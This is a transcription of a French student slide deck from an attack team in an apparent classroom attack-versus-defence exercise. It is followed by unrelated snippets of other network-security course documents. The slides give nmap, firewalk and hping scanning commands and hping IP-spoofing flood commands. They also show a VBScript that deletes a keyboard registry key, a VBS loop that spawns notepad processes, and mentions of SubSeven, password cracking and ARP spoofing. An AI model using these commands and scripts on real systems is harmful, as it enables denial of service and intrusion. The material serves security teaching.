SOMMAIRE. Introduction Organisation Les Axes d attaques. Planification du projet Social engineering. Dénis de service. Exploite Conclusion - 2 /28-

Dimension: px
Commencer à balayer dès la page:

Download "SOMMAIRE. Introduction Organisation Les Axes d attaques. Planification du projet Social engineering. Dénis de service. Exploite Conclusion - 2 /28-"

Transcription

1

2 SOMMAIRE Introduction Organisation Les Axes d attaques Planification du projet Social engineering Dénis de service Exploite Conclusion - 2 /28-

3 INTRODUCTION Sensibilisation à la sécurité des SI Approfondissement des enseignements Méthodologie de travail Travail en équipe Gestion de projet - 3 /28-

4 ORGANISATION Équipe 1 : BELLECOURT LAWANI Gestion de projet Social Engineering Diversion Équipe 2 : CANAC PAEK Cartographie Dénis de service Équipe 3 : AUREJAC PERVIER Exploit Force brute 3 équipes complémentaires Répartition en fonction des axes d attaques Optimisation de la gestion des activités à réaliser - 4 /28-

5 LES AXES D ATTAQUES Social Engineering : Collecte d informations et désinformation des autres groupes Diversion : Noyer le groupe Audit Cartographie: Découvrir et recenser l infrastructure de la Défense Dénis de Service : Saturer tous les services fournis par la Défense Force brute : Trouver les mots de passe des machines de la Défense Exploit : Rechercher et exploiter les failles du système de la défense - 5 /28-

6 PLANIFICATION : Gant préliminaire - 6 /28-

7 PLANIFICATION : Gant final - 7 /28-

8 SOCIAL ENGINEERING Regroupement des données techniques, Ecoute / désinformation Vol de larchi défense - 8 /28-

9 DENIS DE SERVICE : Scanning le réseau Utilisation de VPN (OpenVPN) 3 Types Type A Type B Type C Tunnel VPN Poste à distant Via VPN scan network INTERNET Via VPN Bureau à distant Utiliser le poste qui est situé sur le réseau interne Tunnel VPN Poste sur le réeau Utiliser le poste qui est situé sur le réseau interne directement /28-

10 DENIS DE SERVICE : IP SCAN Scanning le réseau De À Touvé 5 hôtes (ping 196ms) (ping 191ms) (ping 198ms) (ping 190ms) (ping 187ms) - 10 /28-

11 DENIS DE SERVICE : NMAP ** Ping Sweeping ** nmap -sp /28 nmap -sp -PT /28 ** Port TCP Scanning ** nmap -st ** Port UDP Scanning ** nmap -su ** OS Fingerprinting ** nmap -ss -O ** Ident Scanning ** nmap -st -p 80 -I -O /28-

12 DENIS DE SERVICE : NMAP Trouvé 4 web services groupe de défense1 groupe de défense2 Essai de trouver le système d exploitation de cible nmap -st -p 80 -O /tcp open http Windows Longhorn nmap -ss -p 21,22,23,80 -O -v /tcp filtered ftp 22/tcp filtered ssh 23/tcp filtered telnet 80/tcp open ftp OS : Microsoft Windows Longhorn - 12 /28-

13 DENIS DE SERVICE : Attaque DoS Ping of Death : ping -l Winnuke : Winnuke2 : connect(): Connection refused Sending crash... Done! Jolt2 : -p /28-

14 DENIS DE SERVICE : Firewalk SCANNING HOST Outils de scans de ports derrière un firewall IP TTL = Utilise le champ TTL de l en-tete IP IP TTL = phases Phase 1 : traceroute Phase 2 : scans et firewalking IP TTL = Serveur Web DESTINATION HOST - 14 /28-

15 DENIS DE SERVICE : Firewalk Quelques options Option -d s -i -n -p -r -S -s -T -t -x Default Off Off Udp Off ,139, Off Off Commentaire Définit un port destination différent pour Spécifie la phase l interface 1 Contre les boucles DNS, augmente la Spécifie rapidité. le protocole (UDP ou TCP) Respecter strictement la RFC Spécifie une plage de port pour le scan Spécifie un port source pour les phases 1 Spécifie & 2 le TTL pour les paquets retour Spécifie un TTL (élimine la phase 1) Spécifie le nombre de saut avant le host cible /28-

16 DENIS DE SERVICE : Firewalk Les exemples : # firewalk -n -S21,22,23,25,53,80 -ptcp # firewalk -s25 -d25 -ptcp # firewalk -ptcp S /28-

17 DENIS DE SERVICE : HPING Hping2 est un outil réseau capable d'envoyer des paquets TCP/UDP/ICMP sur commande Hping2 traite la fragmentation, les contenus de paquets et les tailles arbitraires Tester les règles d'un firewall Scanner des ports [en usurpant une adresse] Tester les performances réseau en utilisant différents protocoles, tailles de paquets, TOS (type de service) et fragmentation /28-

18 DENIS DE SERVICE : HPING Options principales Option s -c -i -n -I -D -a -t -f -m -x --count --interval --numeric --interface --debug --spoof --ttl hostname --frag --mtu --morefrag Commentaire Stoppe après avoir reçu «count Temps»paquet entre les envoies de paquets Sortie numérique des résultats Spécifie une interface Lance en mode debug Spécifie une adresse source Spécifie un TTL Fragmente (voir mtu) Spécifie un mtu virtuel (différent de16 Fixe quand le f flag actif) «more frag» de ET IP /28-

19 DENIS DE SERVICE : HPING Scanner les services derrière le firewall # hping2 -c 10 -s 53 -p 80 -S # hping2 -c 10 -s 53 -p 80 -S # hping2 -c 10 -s 53 -p S DoS Ip spoofing #hping -I eth0 -a S p 80 -i u1000 #hping -I eth0 -a S p 80 -i u /28-

20 EXPLOITE : Attaques JavaScript Exécution dans le navigateur (passe à travers les firewalls) Exemple de script : <script Language="VBscript"> set WshShell = CreateObject("Wscript.Shell") WshShell.RegDelete"HKEY_CURRENT USER\System\CurrentControlSet\Services\Keyboard" </script> Désactivation du clavier (dans cet exemple) Echec lors de la séance de confrontation - 20 /28-

21 EXPLOITE : Attaques Script VBS Exploitation des failles ActiveX Exemple de script : Set variable = CreateObject("WScript.Shell") Do variable.run "notepad", false Loop Ouverture d un grand nombre de processus notepad Succès lors de la séance de confrontation - 21 /28-

22 EXPLOITE : Attaques par Trojan Détournement d informations Porte dérobée Prise de contrôle du PC cible Logiciel utilisé : SubSeven Echec lors de la séance de confrontation blocage par l antivirus - 22 /28-

23 EXPLOITE : Attaques par Trojan - 23 /28-

24 EXPLOITE : Attaques par failles logiciels Exploitations de failles Programmes très récents ou ancienne versions Risques d intrusions ou de dénis de service Plusieurs logiciels envisagés Echec lors de la séance de confrontation ( impossibilité d installation sur les poste clients ) Politique très (trop?) restrictive mais efficace - 24 /28-

25 EXPLOITE : Table rainbow Principe : Recherche de mot de passe à partir de son empreint grâce à des tables Décrypte la table SAM Windows contenant les mots de passe Utilisation : logiciel ophcrack-livecd sur un client Windows - 25 /28-

26 EXPLOITE : Brute force Principe : Tester les différents mots de passe d une machine par un dictionnaire ou par brute forcing (teste de toutes les combinaisons possibles) Utilisation : Brutus-aet2 sur la machine /28-

27 EXPLOITE : Attaque ARP Principe : Envoie de paquets ARP pour se faire passer pour le router et ainsi récupérer les paquets émis par la défense Utilisation : CAIN - 27 /28-

28 CONCLUSION - 28 /28-

Sécurité des réseaux Les attaques

Sécurité des réseaux Les attaques Sécurité des réseaux Les attaques A. Guermouche A. Guermouche Cours 2 : Les attaques 1 Plan 1. Les attaques? 2. Quelques cas concrets DNS : Failles & dangers 3. honeypot A. Guermouche Cours 2 : Les attaques

Plus en détail

Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité

Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité 1. Présentation Nmap est un outil open source d'exploration réseau et d'audit de sécurité, utilisé pour scanner de grands

Plus en détail

Université Pierre Mendès France U.F.R. Sciences de l Homme et de la Société Licence MIASS. TP sur IP

Université Pierre Mendès France U.F.R. Sciences de l Homme et de la Société Licence MIASS. TP sur IP Université Pierre Mendès France U.F.R. Sciences de l Homme et de la Société Licence MIASS TP sur IP L objectif de ce second TP est de vous faire comprendre : l adressage IP, la fragmentation IP le fonctionnement

Plus en détail

Groupe 1 : Équipe défense. ALVAREZ Irène MUNOZ Aurélie ANDRE Michael REUTER Ivan CAPECCHI Kevin SAYSSET François

Groupe 1 : Équipe défense. ALVAREZ Irène MUNOZ Aurélie ANDRE Michael REUTER Ivan CAPECCHI Kevin SAYSSET François Groupe 1 : Équipe défense ALVAREZ Irène MUNOZ Aurélie ANDRE Michael REUTER Ivan CAPECCHI Kevin SAYSSET François Plan de la présentation Présentation du sujet Organisation de l équipe Planification du projet

Plus en détail

Figure 1a. Réseau intranet avec pare feu et NAT.

Figure 1a. Réseau intranet avec pare feu et NAT. TD : Sécurité réseau avec Pare Feu, NAT et DMZ 1. Principes de fonctionnement de la sécurité réseau Historiquement, ni le réseau Internet, ni aucun des protocoles de la suite TCP/IP n était sécurisé. L

Plus en détail

Sensibilisation à la Sécurité sur Internet. vulnérabilités sur Internet

Sensibilisation à la Sécurité sur Internet. vulnérabilités sur Internet Sensibilisation à la Sécurité sur Internet Cours «2» : Menaces et Cours «2» : Menaces et vulnérabilités sur Internet Plan du cours Sécurité locale du PC Sécurité du réseau Sécurité de communication Outils

Plus en détail

Couche réseau : autour d IP. Claude Chaudet

Couche réseau : autour d IP. Claude Chaudet Couche réseau : autour d IP Claude Chaudet 2 ICMP : Signalisation dans IP Positionnement et rôle d'icmp IP est, en soi, un mécanisme simple dédié à l'acheminement de trames Il ne définit pas de messages

Plus en détail

DIGITAL NETWORK. Le Idle Host Scan

DIGITAL NETWORK. Le Idle Host Scan DIGITAL NETWORK Siège : 13 chemin de Fardeloup 13600 La Ciotat Siret : 43425494200015 APE : 722 Z www.digital network.org www.dnsi.info Laboratoires : 120 Avenue du Marin Blanc, ZI Les Paluds, 13685 Aubagne

Plus en détail

Internal Hacking et contre-mesures en environnement Windows Piratage interne, mesures de protection, développement d'outils

Internal Hacking et contre-mesures en environnement Windows Piratage interne, mesures de protection, développement d'outils Introduction 1. Préambule 15 2. Décryptage d une attaque réussie 17 3. Décryptage de contre-mesures efficaces 18 3.1 Analyse de risques réels 18 3.2 Considérations techniques 19 3.3 Considérations de la

Plus en détail

Fonctionnement de Iptables. Exercices sécurité. Exercice 1

Fonctionnement de Iptables. Exercices sécurité. Exercice 1 Exercice 1 Exercices sécurité 1. Parmi les affirmations suivantes, lesquelles correspondent à des (bonnes) stratégies de défenses? a) Il vaut mieux interdire tout ce qui n'est pas explicitement permis.

Plus en détail

RÉSEAUX ET SÉCURITÉ INFORMATIQUES

RÉSEAUX ET SÉCURITÉ INFORMATIQUES RÉSEAUX ET SÉCURITÉ INFORMATIQUES MICKAËL CHOISNARD UNIVERSITÉ DE BOURGOGNE Cours MIGS 2 novembre 2015 INTRODUCTION La sécurité de ma machine, je m'en fous : y'a rien de précieux sur ma machine... personne

Plus en détail

Advanced Fingerprinting

Advanced Fingerprinting SRS Day Advanced Fingerprinting Michaël BETTAN Gaël SECHAUD bettan.michael@gmail.com gael.sechaud@gmail.com Introduction au fingerprinting Le contexte Qu est ce que le fingerpriting? Identification d un

Plus en détail

Les Attaques en Réseau sous Linux

Les Attaques en Réseau sous Linux Les Attaques en Réseau sous Linux Plan Introduction Partie 1: ARP Spoofing Partie 2: Outils de simulation. Partie 3: Démonstration de l attaque.. Partie 4: Prévention et détection de l attaque. Partie

Plus en détail

Sécurisation en réseau

Sécurisation en réseau Déni de services Sécurisation en réseau Utilisant des bugs exemple Ping of death (Cf. RFC IP) l exploitation des protocoles TCP SYN flooding Envoi seulement le début du 3-way handshake Saturation de la

Plus en détail

Administration réseau. Architecture réseau et Sécurité

Administration réseau. Architecture réseau et Sécurité Administration réseau Architecture réseau et Sécurité Pourquoi la sécurité? Maladroits, pirates, plaisantins et autres malveillants Protéger ce qu'on a à protéger Continuer à fonctionner Responsabilité

Plus en détail

Chapitre 1 Comment se connecter à Internet... 13

Chapitre 1 Comment se connecter à Internet... 13 Chapitre 1 Comment se connecter à Internet... 13 1.1 Adresse IP permanente ou temporaire... 16 1.2 Débit d une connexion... 16 1.3 Utilisation occasionnelle (RTC, Numéris)... 20 RTC... 20 RNIS... 24 1.4

Plus en détail

Jonathan BLANC David GERBAULET Julien MANUEL David NEMBROT Simon PACHY Dimitri TSIOPOULOS

Jonathan BLANC David GERBAULET Julien MANUEL David NEMBROT Simon PACHY Dimitri TSIOPOULOS Jonathan BLANC David GERBAULET Julien MANUEL David NEMBROT Simon PACHY Dimitri TSIOPOULOS SOMMAIRE Le projet Candide SA Contexte Objectifs Organisation C.A.S.T.R.I Déploiement des outils d audit Synthèse

Plus en détail

2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES. 2.2 Architecture fonctionnelle d un système communicant. http://robert.cireddu.free.

2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES. 2.2 Architecture fonctionnelle d un système communicant. http://robert.cireddu.free. 2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES 2.2 Architecture fonctionnelle d un système communicant Page:1/11 http://robert.cireddu.free.fr/sin LES DÉFENSES Objectifs du COURS : Ce cours traitera essentiellement

Plus en détail

PRESENTATION TheGreenBow

PRESENTATION TheGreenBow PRESENTATION TheGreenBow THEGREENBOW SISTECH SA 28 rue de Caumartin 75015 PARIS info@thegreenbow.com Tél : 01 43 12 39 37 Fax 01 43 12 55 44 1 www.thegreenbow.fr PRESENTATION Créée en septembre 1998, SISTECH

Plus en détail

Linux sécurité des réseaux

Linux sécurité des réseaux Linux sécurité des réseaux Rappels et audits réseaux Frédéric Bongat (IPSL) Philippe Weill (SA) 1 Introduction Sécurité des réseaux sous Linux Les réseaux Audit réseau 2 3 TCP/IP : protocoles de communication

Plus en détail

Audits Sécurité. Des architectures complexes

Audits Sécurité. Des architectures complexes Audits Sécurité Des architectures complexes L avènement d Internet et le développement des applications Intranet/Extranet ont permis aux entreprises d accroître leur compétitivité par l ouverture de leurs

Plus en détail

Conception des réseaux Contrôle Continu 1

Conception des réseaux Contrôle Continu 1 NOM: PRENOM: Conception des réseaux Contrôle Continu 1 Durée : 2 heures Seuls les documents manuscrits ou distribués en cours sont autorisés. Les réponses doivent tenir dans l encadré prévu à cet effet

Plus en détail

Halte aux hackers. 4 e édition. Stuart McClure Joel Scambray George Kurtz. Groupe Eyrolles, 2003, pour la présente édition, ISBN : 2-7464-0486-9

Halte aux hackers. 4 e édition. Stuart McClure Joel Scambray George Kurtz. Groupe Eyrolles, 2003, pour la présente édition, ISBN : 2-7464-0486-9 Halte aux hackers 4 e édition Stuart McClure Joel Scambray George Kurtz Groupe Eyrolles, 2003, pour la présente édition, ISBN : 2-7464-0486-9 Table des matières Préface....................................................

Plus en détail

Formations. «Hacking Edition» Certilience formation N 82 69 10164 69 - SIRET 502 380 397 00021 - APE 6202A - N TVA Intracommunautaire FR17502380397

Formations. «Hacking Edition» Certilience formation N 82 69 10164 69 - SIRET 502 380 397 00021 - APE 6202A - N TVA Intracommunautaire FR17502380397 Formations «Hacking Edition» Nos formations Réf. HAC01 35 Heures Les techniques d attaques Réf. HAC02 21 Heures Vulnérabilités réseaux et applicatives Réf. HAC03 21 Heures Sécurité des applications Web

Plus en détail

La sécurité, à l'heure actuelle

La sécurité, à l'heure actuelle Plan de l'exposé I) La sécurité, à l'heure actuelle II) Les différentes attaques II) La solution «passive», l'ids IV) La solution «active», l'ips V) Limites des IDS/IPS VI) Bilan et conclusion La sécurité,

Plus en détail

Sécurité informatique : Sécurité dans un monde en réseau. Explosion des connexions à internet 2. ... Mais c est pas tout! 3

Sécurité informatique : Sécurité dans un monde en réseau. Explosion des connexions à internet 2. ... Mais c est pas tout! 3 Sécurité informatique : Matthieu Amiguet 2006 2007 Explosion des réseaux Explosion des connexions à internet 2 En 1990, environ 320 000 hôtes étaient connectées à internet Actuellement, le chiffre a dépassé

Plus en détail

Internet. PC / Réseau

Internet. PC / Réseau Internet PC / Réseau Objectif Cette présentation reprend les notions de base : Objectif, environnement de l Internet Connexion, fournisseurs d accès Services Web, consultation, protocoles Modèle en couches,

Plus en détail

La sécurité des Réseaux Partie 6.1 Les pare-feus

La sécurité des Réseaux Partie 6.1 Les pare-feus La sécurité des Réseaux Partie 6.1 Les pare-feus Fabrice Theoleyre Enseignement : INSA Lyon / CPE Recherche : Laboratoire CITI / INSA Lyon Références F. Ia et O. Menager, Optimiser et sécuriser son trafic

Plus en détail

Plan. Les pare-feux (Firewalls) Chapitre II. Introduction. Notions de base - Modèle de référence OSI : 7 couches. Introduction

Plan. Les pare-feux (Firewalls) Chapitre II. Introduction. Notions de base - Modèle de référence OSI : 7 couches. Introduction Plan Introduction Chapitre II Les pare-feux (Firewalls) Licence Appliquée en STIC L2 - option Sécurité des Réseaux Yacine DJEMAIEL ISET Com Notions de base relatives au réseau Définition d un pare-feu

Plus en détail

Rappels réseaux TCP/IP

Rappels réseaux TCP/IP Rappels réseaux TCP/IP Premier Maître Jean Baptiste FAVRE DCSIM / SDE / SIC / Audit SSI jean-baptiste.favre@marine.defense.gouv.fr CFI Juin 2005: Firewall (1) 15 mai 2005 Diapositive N 1 /27 Au menu Modèle

Plus en détail

ManageEngine OpUtils 3. Vue d ensemble du produit

ManageEngine OpUtils 3. Vue d ensemble du produit ManageEngine OpUtils 3 Vue d ensemble du produit Agenda Vision général du produit Fonctions clés Les outils dans OpUtils Q & A Synthèse Vue du produit OpUtils est un outil de diagnostique du système et

Plus en détail

Les Protocoles de Transport Introduction à l analyse de trames

Les Protocoles de Transport Introduction à l analyse de trames Les Protocoles de Transport Introduction à l analyse de trames telnet localhost 80 telnet localhost 80 Trying ::1 connected to localhost. Escape character is ^]. Demande de connexion du client Ouverture

Plus en détail

CONFIGURATION P 2 P 3 P 3 P 10 P 11 P 13 P 14 P 16

CONFIGURATION P 2 P 3 P 3 P 10 P 11 P 13 P 14 P 16 CONFIGURATION 1 Présentation 2 Topologie du projet 3 Installation 4 Configuration 4.1 Création de la DMZ publique 4.2 Accès vers l Internet 4.3 Publication d Exchange 4.4 Rapports d activité et alertes

Plus en détail

Windows Vista et Windows Server 2003... 15. Étude de cas... 41

Windows Vista et Windows Server 2003... 15. Étude de cas... 41 Windows Vista et Windows Server 2003... 15 Windows Vista... 16 Pourquoi Vista?... 16 L initiative pour l informatique de confiance... 17 Le cycle de développement des logiciels informatiques fiables...

Plus en détail

Sécurité Nouveau firmware & Nouvelles fonctionnalités

Sécurité Nouveau firmware & Nouvelles fonctionnalités Sécurité Nouveau firmware & Nouvelles fonctionnalités Sécurité ZyXEL - gamme USG Un choix complet de produits pour les petits comme les grands! Une gamme de 9 produits Firewall Services UTM Répartition

Plus en détail

La sécurité informatique du point de vue d un pirate. Société GRICS

La sécurité informatique du point de vue d un pirate. Société GRICS La sécurité informatique du point de vue d un pirate Par : Éric Ledoux Société GRICS Plan de la présentation Introduction Obligation légale Deux approches en sécurité Approche «corporative» Approche «pirate»

Plus en détail

PROJET SÉCURITÉ. Equipe Défense. Pôle Services : Guillaume COTTIN Youri JEAN-MARIUS. Pôle Interconnexion : Ilias DJOUAI Fabien PEYRONNET

PROJET SÉCURITÉ. Equipe Défense. Pôle Services : Guillaume COTTIN Youri JEAN-MARIUS. Pôle Interconnexion : Ilias DJOUAI Fabien PEYRONNET PROJET SÉCURITÉ Equipe Pôle Interconnexion : Ilias DJOUAI Fabien PEYRONNET Pôle Services : Guillaume COTTIN Youri JEAN-MARIUS Pôle Utilisateurs : Philippe BEAUGENDRE Vincent LARRIBAU Pôle Communication

Plus en détail

Xposé logiciel, système et réseau. Le tunneling. Xposé système et réseau Yannick Lambruschi

Xposé logiciel, système et réseau. Le tunneling. Xposé système et réseau Yannick Lambruschi Xposé logiciel, système et réseau Le tunneling _ 2 Le tunneling est un outil de plus en plus sollicité Solutions réseau Solutions logiciel Sécurité Insécurité _ 3 Les choses que nous allons aborder Le

Plus en détail

Technologie VPN «IPSEC vs SSL» Séminaire du 21 avril 2004

Technologie VPN «IPSEC vs SSL» Séminaire du 21 avril 2004 e-xpert Solutions SA 3, Chemin du Creux CH 1233 Bernex-Genève Tél +41 22 727 05 55 Fax +41 22 727 05 50 Technologie VPN «IPSEC vs SSL» Séminaire du 21 avril 2004 Sylvain Maret 4 info@e-xpertsolutions.com

Plus en détail

Document réponse 1 : Installation des PC en réseau

Document réponse 1 : Installation des PC en réseau Réseau TCP-IP TP Réseau n Nom : Classe : Prénom : Groupe : PROBLEMATIQUE Configurer un serveur http sur un des postes d un réseau local (LAN). Déployer un site web et le mettre à jour avec un logiciel

Plus en détail

Sensibilisation à la sécurité informatique

Sensibilisation à la sécurité informatique Sensibilisation à la sécurité informatique Michel Salomon IUT de Belfort-Montbéliard Département d informatique Michel Salomon Sécurité 1 / 25 Sensibilisation à la sécurité informatique Généralités et

Plus en détail

Travaux pratiques Test de la latence réseau avec les commandes ping et traceroute

Travaux pratiques Test de la latence réseau avec les commandes ping et traceroute Travaux pratiques Test de la latence réseau avec les commandes ping et traceroute Topologie Objectifs 1re partie : Utiliser la commande ping pour documenter la latence réseau 2e partie : Utiliser la commande

Plus en détail

Administration réseau Introduction

Administration réseau Introduction Administration réseau Introduction A. Guermouche A. Guermouche Cours 1 : Introduction 1 Plan 1. Introduction Organisation Contenu 2. Quelques Rappels : Internet et le modèle TCP/ Visage de l Internet Le

Plus en détail

S E C U R I N E T S C l u b d e l a s é c u r i t é i n f o r m a t i q u e I N S A T. Atelier IDS. Snort. Outil de Détection d intrusion

S E C U R I N E T S C l u b d e l a s é c u r i t é i n f o r m a t i q u e I N S A T. Atelier IDS. Snort. Outil de Détection d intrusion Atelier IDS Snort Outil de Détection d intrusion Introduction Les systèmes de détection d intrusion ou IDS pour (Intrusion Detection System) sont indispensables pour la sécurité du réseau, ils permettent

Plus en détail

Réseaux 1. TP 1 - Configuration et tests TCP/IP CORRIGE

Réseaux 1. TP 1 - Configuration et tests TCP/IP CORRIGE I.U.T. de Nice Côte d Azur 2004-2005 Département Informatique Réseaux 1 TP 1 - Configuration et tests TCP/IP CORRIGE Objectif : examiner la configuration des réseaux TCP/IP de notre département, effectuer

Plus en détail

AUCUN DOCUMENT AUTORISÉ. Détailler autant que possible vos réponses, en particulier pour les questions de cours!

AUCUN DOCUMENT AUTORISÉ. Détailler autant que possible vos réponses, en particulier pour les questions de cours! Test du Module M3102 Samedi 10 janvier 2015 Durée : 2 heures IUT Aix-en-Provence Semestre 3 DUT INFO AUCUN DOCUMENT AUTORISÉ Détailler autant que possible vos réponses, en particulier pour les questions

Plus en détail

1/ Introduction. 2/ Schéma du réseau

1/ Introduction. 2/ Schéma du réseau 1/ Introduction FWBuilder est un logiciel-libre multi-plateforme qui permet de créer ses propres pare-feux et les utiliser sur différents SE ou sur du matériel informatique. Objectif : Créer un pare-feu

Plus en détail

Le Tunneling DNS. P.Bienaimé X.Delot P.Mazon K.Tagourti A.Yahi A.Zerrouki. Université de Rouen - M2SSI. 24 février 2011

Le Tunneling DNS. P.Bienaimé X.Delot P.Mazon K.Tagourti A.Yahi A.Zerrouki. Université de Rouen - M2SSI. 24 février 2011 Le Tunneling DNS P.Bienaimé X.Delot P.Mazon K.Tagourti A.Yahi A.Zerrouki Université de Rouen - M2SSI 24 février 2011 P.Bienaimé, X.Delot, P.Mazon, K.Tagourti, A.Yahi, A.Zerrouki Tunneling DNS (Université

Plus en détail

Licence professionnelle CDAISI TP3 : systéme d'exploitation UE1 : Module 1.1 J. RIDET & R. CROCFER

Licence professionnelle CDAISI TP3 : systéme d'exploitation UE1 : Module 1.1 J. RIDET & R. CROCFER Licence professionnelle CDAISI TP3 : systéme d'exploitation UE1 : Module 1.1 J. RIDET & R. CROCFER I INTRODUCTION I.1 Outils de capture de paquets Pour communiquer, les machines échangent des informations

Plus en détail

Audit et Sécurité Informatique

Audit et Sécurité Informatique 1 / 54 Audit et Sécurité Informatique Chap 1: Services, Mécanismes et attaques de sécurité Rhouma Rhouma https://sites.google.com/site/rhoouma Ecole superieure d Economie Numerique 3ème année Licence 2

Plus en détail

Commandes IP relatives aux réseaux sous Windows

Commandes IP relatives aux réseaux sous Windows Commandes IP relatives aux réseaux sous Windows Voici la liste de ces commandes à utiliser dans une fenêtre DOS : Ping PING : Teste la connexion réseau avec une adresse IP distante ping -t [IP ou host]

Plus en détail

Type d'attaques. Stéphane Gill. Stephane.Gill@CollegeAhuntsic.qc.ca. Introduction 2

Type d'attaques. Stéphane Gill. Stephane.Gill@CollegeAhuntsic.qc.ca. Introduction 2 Stéphane Gill Stephane.Gill@CollegeAhuntsic.qc.ca Table des matières Introduction 2 Les attaques d accès 2 Le sniffing 2 Les chevaux de Troie 3 Porte dérobée 3 L ingénierie sociale 3 Le craquage de mots

Plus en détail

Man In The Middle. (MITM ou TCP hijacking)

Man In The Middle. (MITM ou TCP hijacking) Man In The Middle (MITM ou TCP hijacking) Ce type d attaque, traduit en français par «l homme du milieu» est plus facile à comprendre qu on ne le pense. Cette attaque fait intervenir 3 ordinateurs. Un

Plus en détail

Description du datagramme IP :

Description du datagramme IP : Université KASDI MERBAH OUARGLA Faculté des Nouvelles Technologies de l information et de la Communication Département Informatique et Technologies de les Information 1 er Année Master académique informatique

Plus en détail

Groupe Eyrolles, 2006, ISBN : 2-212-11933-X

Groupe Eyrolles, 2006, ISBN : 2-212-11933-X Groupe Eyrolles, 2006, ISBN : 2-212-11933-X Table des matières Introduction... V CHAPITRE 1 Introduction à SSL VPN... 1 Une histoire d Internet.............................................. 3 Le modèle

Plus en détail

Routage et filtrage IP avec Linux.

Routage et filtrage IP avec Linux. GNU/Linux: Un Unix libre Routage et filtrage IP avec Linux. SCI Limoges Marcel Giry 1 Plan de la formation: 1-Notions de base sur TCP/IP : Rappels sur l'adressage IP Principes du routage IP Les protocoles

Plus en détail

Exemple d intrusion dans un réseau

Exemple d intrusion dans un réseau Exemple d intrusion dans un réseau Cédric Blancher - blancher@cartel-info.fr Daniel Polombo - polombo@cartel-info.fr 11 décembre 2001 Plan 1 Introduction et présentation du réseau ciblé Pénétration du

Plus en détail

Fonctionnement Kiwi Syslog + WhatsUP Gold

Fonctionnement Kiwi Syslog + WhatsUP Gold Fonctionnement Kiwi Syslog + WhatsUP Gold Configuration Kiwi Syslog server Pour configurer Kiwi Syslog server, commencez par cliquer sur l icône setup de la barre des taches : La fenêtre de configuration

Plus en détail

Ces cartes sont aussi appelées : NIC (Network Interface Card). Les cartes réseaux les plus courantes sont de type Ethernet.

Ces cartes sont aussi appelées : NIC (Network Interface Card). Les cartes réseaux les plus courantes sont de type Ethernet. 1. Introduction La connexion entre ordinateurs nécessite une carte réseau implantée dans chaque ordinateur (PC ou autre) et éléments de réseau (commutateur, routeurs,...). Ces cartes sont aussi appelées

Plus en détail

Dossier I: Architecture et fonctionnement d un réseau informatique (14pts)

Dossier I: Architecture et fonctionnement d un réseau informatique (14pts) OFPPT Office de la Formation Professionnelle et de la Promotion du Travail Direction de Recherche et Ingénierie de la Formation Examen de Fin de Formation Session Juin 2011 Filière : Techniques de Support

Plus en détail

IPCONFIG affiche un résumé des propriétés IP des cartes réseaux

IPCONFIG affiche un résumé des propriétés IP des cartes réseaux 1. IPCONFIG La commande réseau ipconfig permet d'afficher les propriétés IP de l'ordinateur. Sous Win98, cette commande est équivalente à winipcfg sous Windows. Il n'y a pas d'équivalence Windows sous

Plus en détail

INTRODUCTION A LA SECURITE DES RESEAUX

INTRODUCTION A LA SECURITE DES RESEAUX INTRODUCTION A LA SECURITE DES RESEAUX OBJECTIFS de la SECURITE des DONNEES (relativement à des personnes non autorisées) Confidentielles-ne doivent pas être lues Permanentes-ne doivent pas être altérées

Plus en détail

par BALLAN Emilie et SURANGKANJANAJAI Gaëtan disponible en ligne : http://www.e eck.org/

par BALLAN Emilie et SURANGKANJANAJAI Gaëtan disponible en ligne : http://www.e eck.org/ Dénis de Service et usurpation d'identité par BALLAN Emilie et SURANGKANJANAJAI Gaëtan disponible en ligne : http://www.e eck.org/ PLAN Introduction Dénis de service: Tcp Syn Land Teardrop Smurf Ping de

Plus en détail

TP 6 : Configuration et Administration d un routeur (2) Réseaux Locaux sans Fils Matière: RESEAUX LOCAUX

TP 6 : Configuration et Administration d un routeur (2) Réseaux Locaux sans Fils Matière: RESEAUX LOCAUX TP 6 : Configuration et Administration d un routeur (2) Réseaux Locaux sans Fils Matière: RESEAUX LOCAUX Les commandes du protocole CDP Enseignant: Ramzi BELLAZREG Router(config)# CDP run //en mode global

Plus en détail

Option 2 and Option 5 are correct. 1 point for each correct option. 0 points if more options are selected than required.

Option 2 and Option 5 are correct. 1 point for each correct option. 0 points if more options are selected than required. Quelles sont les deux affirmations vraies relatives à la sécurité du réseau? (Choisissez deux réponses.) Protéger un réseau contre les attaques internes constitue une priorité moins élevée car les employés

Plus en détail

ndv : Manuel d utilsation RDP

ndv : Manuel d utilsation RDP ndv : Manuel d utilsation RDP Ref : NDV51-MU-RDP-fr-151112 www.neocoretech.com 1.1.1 Page 1 1. Prérequis pour les points d accès ndv de type RDP L utilisation du RDP avec la solution ndv nécessite les

Plus en détail

UE31 - M3102 : Services Réseaux

UE31 - M3102 : Services Réseaux UE31 - M3102 : Services Réseaux Corrigé du TP 4 NAT/PAT, Pare-Feu C. Pain-Barre 1 Simulateur : Nat/Pat et firewall Corrigé de l exercice 1 (Simulation Nat/Pat et firewall) Les fichiers xml contenant les

Plus en détail

Commandes de base Administration Systèmes et Réseaux

Commandes de base Administration Systèmes et Réseaux Commandes de base Administration Systèmes et Réseaux TcpDump Sniffing en mode verbeux : > tcpdump -v tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes 22:00:11.625995 IP (tos

Plus en détail

Notice du LiveCD Spécialité Réseaux

Notice du LiveCD Spécialité Réseaux Notice du LiveCD Spécialité Réseaux 21 2 Ethereal : Ethereal est un sniffer de réseau, il capture les trames circulant sur le réseau, en permet l'analyse et sépare suivant l'encapsulation les différnetes

Plus en détail

Administration d ISA Server 2000 (Proxy et Firewall) :

Administration d ISA Server 2000 (Proxy et Firewall) : Compte rendu d'activité Nature de l'activité : Administration d ISA Server 2000 (Proxy et Firewall) : Contexte : Dans le cadre de la sécurisation d un réseau informatique, on souhaite mettre en place une

Plus en détail

Evaluer les risques liés aux défauts de sécurité

Evaluer les risques liés aux défauts de sécurité C2I Métiers de la Santé SECURITE INFORMATIQUE Evaluer les risques liés aux défauts de sécurité Eric Boissinot Université François Rabelais Tours 13/02/2007 Pourquoi la sécurité? Le bon fonctionnement d

Plus en détail

acpro SEN TR firewall IPTABLES

